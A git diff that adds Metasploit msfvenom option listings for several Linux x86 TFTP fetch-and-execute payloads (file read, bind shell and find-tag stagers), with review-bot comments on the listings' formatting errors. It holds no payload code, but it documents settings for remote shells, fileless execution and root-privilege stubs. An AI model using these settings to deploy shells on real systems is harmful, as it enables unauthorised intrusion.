@@ -0,0 +1,76 @@ + + Name: TFTP Fetch, Linux Read File + Module: payload/cmd/linux/tftp/x86/read_file + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FD 1 yes The file descriptor to write output to +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PATH yes The file path to read + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aeIgRARy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend 
a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..db54df9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp.txt 
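Review bot: the AppendExit row in the advanced options table of cmd-linux-tftp-x86-read_file.txt carries the PrependChrootBreak description ("Prepend a stub that will break out of a chroot (includes setreuid to root)"), which cannot be right for an option named AppendExit; the same wrong row appears in every file of this set. Since these files are verbatim tool output, the fix belongs upstream in the payload's option definition, but the repository should say so: a short README note that descriptions are reproduced as printed and that this one is known to be wrong would stop the error from being re-reported against this repo.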
@@ -0,0 +1,94 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ztrcKmCZsi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). 
+ + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID 
(deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..6f30cc4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp_uuid.txt 
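Review bot: two Description cells in cmd-linux-tftp-x86-shell-bind_ipv6_tcp.txt are malformed as printed: PingbackRetries reads "How many additional successful pingbacks" (an unfinished sentence), and FETCH_FILELESS has an unbalanced parenthesis in "(for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)". Anyone splitting these tables by column will get ragged cells; if the generator post-processes the output at all, closing the parenthesis is a one-line fix, otherwise flag both as upstream text.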
@@ -0,0 +1,95 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KpEpsXAIvkIl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). 
+ + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_nonx_tcp.txt new file mode 100644 index 0000000..f2e894d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_nonx_tcp.txt 
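Review bot: cmd-linux-tftp-x86-shell-bind_ipv6_tcp_uuid.txt differs from the bind_ipv6_tcp file above only in the Name, Module, Total size, FETCH_FILENAME and the added "OJ Reeves" provider line, with the remaining ~90 lines duplicated; that is fine for a snapshot, but with this many near-identical files the repository needs a README stating the exact command used to produce each file (the module path on the "Module:" line plus the msfvenom list-options invocation) and the Metasploit version it was taken from, so a reviewer can regenerate and diff rather than eyeball the tables.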
@@ -0,0 +1,92 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WlPZFdeTUcLW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot 
(includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..7864986 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp.txt 
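Review bot: the header of cmd-linux-tftp-x86-shell-bind_nonx_tcp.txt reads "TFTP Fetch, Linux Command Shell, Bind TCP Stager" without the "(Linux x86)" suffix the bind_ipv6_tcp and bind_tcp siblings carry, and neither the Name nor the Description block says what distinguishes this non-NX stager from the plain bind_tcp one; the "Module:" line is the only clue. That wording is upstream metadata, but since the two files are otherwise near-identical, the README should list the files with a one-line note on what each variant is, so the nonx and bind_tcp entries are not confused when someone looks for a payload by description.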
@@ -0,0 +1,93 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/tftp/x86/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KClQpwqp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). 
+ + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) 
+ PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp_uuid.txt new file mode 100644 index 0000000..f730a13 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp_uuid.txt 
@@ -0,0 +1,94 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XscFaQAKUsU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). 
+ + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-find_tag.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-find_tag.txt new file mode 100644 index 0000000..01a6059 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-find_tag.txt 
@@ -0,0 +1,91 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Tag Stager + Module: payload/cmd/linux/tftp/x86/shell/find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WYOJTmMAFVMA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot 
